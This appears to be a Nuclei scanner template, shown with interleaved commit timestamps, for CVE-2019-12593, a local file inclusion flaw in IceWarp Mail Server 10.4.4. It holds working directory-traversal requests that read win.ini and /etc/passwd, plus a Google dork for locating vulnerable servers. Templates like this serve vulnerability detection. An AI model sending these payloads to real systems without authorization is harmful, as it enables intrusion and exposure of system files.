2021-01-02 04:59:06 +00:00
id : CVE-2019-12593
2020-09-05 06:49:58 +00:00
info :
2021-03-30 06:51:17 +00:00
name : IceWarp <=10.4.4 - Local File Inclusion
2020-09-05 06:49:58 +00:00
author : pikpikcu
2020-09-05 07:11:21 +00:00
severity : high
2021-03-30 06:51:17 +00:00
description : IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
2021-02-05 19:44:41 +00:00
tags : cve,cve2019,lfi
2021-08-19 13:17:27 +00:00
reference :
- https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt
- https://nvd.nist.gov/vuln/detail/CVE-2019-12593
- http://www.icewarp.com # vendor homepage
- https://www.icewarp.com/downloads/trial/ # software link
additional-fields :
google-dork : Powered By IceWarp 10.4.4
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.50
cve-id : CVE-2019-12593
cwe-id : CWE-22
2020-09-05 06:49:58 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini'
- '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd'
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "[intl]"
2020-09-05 07:11:21 +00:00
- "root:x:0"